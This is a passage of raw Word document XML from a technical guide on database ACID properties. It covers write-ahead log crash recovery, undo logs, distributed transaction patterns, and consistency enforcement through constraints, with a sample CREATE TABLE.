        <w:t>If crash at step 4 (before COMMIT in WAL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E61201C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Recovery: scan WAL → T1 has no COMMIT record → UNDO all T1's changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19A80B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Data pages reverted to pre-transaction state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650679F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="55A3E606" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>If crash at step 6 (after COMMIT in WAL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBC54EA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Recovery: scan WAL → T1 has COMMIT record → REDO all T1's changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53125B97" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Ensure data pages reflect T1's changes (in case they weren't flushed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02508DBF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The COMMIT point is the WAL flush:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675A7C5A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156169BC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Before WAL flush: transaction can be rolled back (no trace remains).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5521FE07" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>After WAL flush: transaction is committed (will survive any crash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141B3D3E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>The single moment of WAL fsync is the atomic dividing line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7409402C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Undo log (for rollback of in-progress transactions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EFD138" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083A274A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>When modifying a row, the OLD value is saved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A020279" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Undo log: [T1, row_id=42, column=balance, old_value=500]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A25A575" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="114980FA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>If T1 is aborted (or crash before commit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5B9E1" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Read undo log → restore old_value=500 → row is back to original.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718DC62" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="1FCB67CE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>This enables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A1942" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Explicit ROLLBACK (application decides to abort)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087E77E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Crash recovery (incomplete transactions automatically rolled back)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C8C9E8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - MVCC (other transactions can see the old value while T1 is in progress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F689F2" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Atomicity Across Systems (Distributed Transactions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4216D963" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019E87F4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t>Single database atomicity: handled by WAL (straightforward).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D25F14" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="56964806" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Cross-system atomicity (Service A's DB + Service B's DB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55F79A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Neither database can independently guarantee the OTHER committed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308BE97" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2184730F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713ED5DF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Two-Phase Commit (2PC): Coordinator asks both to PREPARE, then COMMIT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129FBA89" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Saga pattern: Compensating transactions on failure (eventual atomicity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C3CA40" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Outbox pattern: Write to local DB + outbox table atomically, process outbox async.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3632C0BC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:pict w14:anchorId="7085B59F">
          <v:rect id="_x0000_i6696" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5418AAB6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Consistency — Valid State Transitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5159EDB8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02019160" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>A transaction takes the database from one valid state to another valid state. All defined rules (constraints, triggers, cascades) are satisfied before and after the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132C813" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important distinction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:t> This is NOT the same "consistency" as in distributed systems (CAP theorem). ACID consistency is about data integrity RULES within a single database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64323D38" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766386A6" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Consistency rules (invariants):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331916D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Account balance must never be negative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA4FE00" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - email column must be unique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B14C6B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - order.customer_id must reference an existing customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD9FFA" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - SUM of all account balances in a closed system remains constant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F2471" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - A department must have at least one employee if it exists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A5EF18" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="06D26914" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Transaction that violates consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5115D352" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  UPDATE accounts SET balance = -50 WHERE id = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D58CD53" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  → REJECTED (CHECK constraint: balance &gt;= 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C9CF81" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → Transaction aborted, no change made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732A6658" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 How Consistency Is Enforced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA5400B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A96CC6D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Database-level enforcement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762D30AF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - NOT NULL constraints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB1A787" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - UNIQUE constraints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4074CCEB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - CHECK constraints (balance &gt;= 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE63C45" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - FOREIGN KEY constraints (referential integrity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA3084C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - EXCLUSION constraints (no overlapping ranges)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B820E4C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Triggers (complex business rules)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B4669" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Domain types (positive_integer, valid_email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49790AF4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="43A60031" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52623190" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  CREATE TABLE accounts (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C145262" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    id UUID PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A930BF" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    balance DECIMAL NOT NULL CHECK (balance &gt;= 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC0039A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    email TEXT UNIQUE NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4456FA38" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">    customer_id UUID REFERENCES customers(id) ON DELETE RESTRICT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA16ED" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDE611A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34402EF0" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Any transaction that would violate these constraints is automatically aborted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5576D8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  The database GUARANTEES these rules hold before and after every transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD0525" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Application-Level Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B63FC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B7AB04" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Not all invariants can be expressed as database constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71288494" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - "Total inventory across all warehouses must equal purchase orders - shipments"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A731096" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - "A user's subscription level must match their payment status"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5016D8" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - "The sum of all debits must equal the sum of all credits"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8939D3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="7D7C6070" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>These are APPLICATION responsibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CB495" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  The database ensures the transaction is atomic (A) and isolated (I).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF87066" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  The APPLICATION ensures the operations within maintain the invariant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FCE2B4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491F193" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  If the application writes: balance = -50 (and no CHECK constraint exists)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DED7A9A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  → Database will accept it (no constraint violated from DB's perspective).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A855CDC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  → But the application-level invariant is broken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09482197" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D6424" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Principle: Put as many constraints as possible IN the database (enforced always).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61377B17" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
